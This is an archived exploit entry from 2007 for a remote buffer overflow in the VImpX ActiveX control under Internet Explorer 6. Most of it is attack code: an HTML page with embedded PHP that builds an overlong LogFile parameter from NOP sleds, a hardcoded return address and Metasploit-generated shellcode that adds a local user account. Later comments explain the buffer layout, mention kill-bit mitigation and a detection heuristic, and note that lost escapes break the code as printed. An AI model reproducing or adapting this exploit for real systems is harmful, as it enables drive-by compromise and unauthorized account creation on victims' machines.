# Title : VImpX ActiveX (VImpX.ocx v. 4.7.3.0) Remote Buffer Overflow Exploit
# Published : 2007-05-13
# Author : rgod
<!--
IE 6 / DB Software Laboratory VImpX ActiveX (VImpX.ocx v. 4.7.3.0)
remote buffer overflow exploit
windows xp sp2 it version / eip overwrite method
by rgod
site: http://retrogod.altervista.org
mail: retrog at alice dot it
software site: http://www.dbsoftlab.com/e107_plugins/content/content.php?content.53
-->
<html>
<object classid='clsid:7600707B-9F47-416D-8AB5-6FD96EA37968' id='VImpAX1'>
<?php
/*
 * Proof-of-concept payload builder for the VImpX ActiveX control. The
 * <object> element above instantiates the control by CLSID; the over-long
 * string assembled here is then handed to it as the "LogFile" parameter,
 * which is the overflowing sink described in the title.
 *
 * Defensive reading: the exposure is the LogFile property of VImpX.ocx
 * 4.7.3.0 reachable from any web page in a browser that will instantiate
 * the control. The standard mitigations for a vulnerable ActiveX control are
 * to block its CLSID in the browser (kill bit) and to upgrade or remove the
 * component; a detection heuristic is a page embedding this CLSID with a
 * LogFile value far longer than any plausible file path.
 *
 * NOTE(review): the string literals below appear to have lost their
 * backslash escapes in transcription ("x90" rather than an escaped byte),
 * and the echo line contains unescaped nested double quotes, so as printed
 * this page is a record of the technique rather than runnable code; it is
 * left byte-for-byte as archived.
 */
/* win32_adduser - PASS=tzu EXITFUNC=seh USER=sun Size=483 Encoder=PexAlphaNum http://metasploit.com */
// Per the generator comment above: a Metasploit-produced, alphanumeric-encoded
// payload that adds a local user account (USER=sun / PASS=tzu) on the target.
$shellcode =
"xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49".
"x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36".
"x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34".
"x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41".
"x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4ax4ex46x54".
"x42x30x42x30x42x30x4bx58x45x44x4ex43x4bx38x4ex57".
"x45x50x4ax37x41x50x4fx4ex4bx48x4fx44x4ax51x4bx48".
"x4fx45x42x42x41x50x4bx4ex49x34x4bx48x46x43x4bx38".
"x41x30x50x4ex41x43x42x4cx49x49x4ex4ax46x58x42x4c".
"x46x57x47x50x41x4cx4cx4cx4dx50x41x30x44x4cx4bx4e".
"x46x4fx4bx33x46x35x46x42x46x50x45x47x45x4ex4bx58".
"x4fx35x46x32x41x30x4bx4ex48x56x4bx48x4ex50x4bx54".
"x4bx38x4fx35x4ex41x41x50x4bx4ex4bx38x4ex51x4bx38".
"x41x30x4bx4ex49x38x4ex45x46x42x46x50x43x4cx41x43".
"x42x4cx46x46x4bx58x42x44x42x33x45x48x42x4cx4ax57".
"x4ex50x4bx38x42x54x4ex30x4bx38x42x37x4ex41x4dx4a".
"x4bx58x4ax36x4ax30x4bx4ex49x50x4bx58x42x38x42x4b".
"x42x50x42x50x42x30x4bx38x4ax56x4ex43x4fx55x41x53".
"x48x4fx42x36x48x55x49x48x4ax4fx43x58x42x4cx4bx47".
"x42x45x4ax36x42x4fx4cx58x46x30x4fx45x4ax46x4ax49".
"x50x4fx4cx38x50x30x47x45x4fx4fx47x4ex43x36x4dx56".
"x46x36x50x32x45x46x4ax47x45x56x42x52x4fx52x43x36".
"x42x52x50x46x45x56x46x47x42x52x45x47x43x37x45x56".
"x44x57x42x42x43x57x45x47x50x56x42x52x46x47x4cx37".
"x45x47x42x52x4fx42x41x34x46x34x46x54x42x42x48x42".
"x48x32x42x52x50x46x45x36x46x57x42x52x4ex46x4fx36".
"x43x56x41x46x4ex36x47x56x44x47x4fx36x45x57x42x37".
"x42x52x41x54x46x46x4dx56x49x46x50x56x49x36x43x37".
"x46x47x44x37x41x56x46x47x4fx56x44x37x43x37x42x52".
"x43x57x45x57x50x46x42x42x4fx32x41x34x46x54x46x54".
"x42x50x5a";
// Four filler bytes placed directly after the overwritten return address.
$junk = "x45x45x45x59";
$eip = "x2dxd1xe0x77"; // call eax user32.dll
// Buffer layout, left to right: 268 filler bytes up to the saved return
// address, the 4-byte address above, $junk, five more bytes, 16 NOPs, the
// payload, then a large trailing NOP sled. The 268-byte offset and the
// user32.dll address are build-specific (see the "windows xp sp2" line in
// the header); they are what makes this PoC fragile across other builds.
$exploit= str_repeat("x90",268).$eip.$junk."x90x90x90x0dx01".str_repeat("x90",16).$shellcode.str_repeat("x90",9999);
// Emitted into the enclosing <object> element as the LogFile parameter value,
// which is where the oversized string reaches the control.
echo "<param name="LogFile" value="$exploit"/>";
?>
</object>
</html>